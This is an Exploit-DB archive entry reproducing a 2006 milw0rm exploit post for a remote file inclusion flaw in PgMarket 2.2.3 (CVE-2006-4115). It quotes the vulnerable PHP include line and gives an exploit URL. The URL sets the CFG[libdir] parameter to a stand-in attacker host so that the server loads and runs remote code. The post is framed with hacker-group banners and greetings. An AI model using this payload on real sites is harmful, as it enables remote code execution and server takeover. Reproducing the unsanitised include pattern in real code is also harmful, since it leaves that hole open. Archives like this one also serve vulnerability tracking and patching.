PgMarket <= 2.2.3 - CFGlibdir Remote File Inclusion Vulnerability

2006-08-09T00:00:00
ID EDB-ID:2154
Type exploitdb
Reporter Mehmet Ince
Modified 2006-08-09T00:00:00

Description

PgMarket <= 2.2.3 (CFG[libdir]) Remote File Inclusion Vulnerability. CVE-2006-4115. Webapps exploit for php platform

                                        
                                            ####################################################
#
#
#           C Y B E R - W A R R i O R   T I M
#
#
####################################################

PgMarket 2.2.3 (CFG[libdir]) Remote File Inclusion Vulnerabilities

####################################################

Author: xoron

####################################################

Class : Remote

####################################################

cont@ct: x0r0n[at]hotmail[dot]com

####################################################

Code:

include ($CFG["libdir"] . "stdlib.inc.php");

####################################################

Exploit:
http://www.site.com/[path]/common.inc.php?CFG[libdir]=http://evil_scripts?

####################################################

Greetz: str0ke, Preddy, Iron, x-master, DJR, R3D4C!D and all my friends

####################################################

# milw0rm.com [2006-08-09]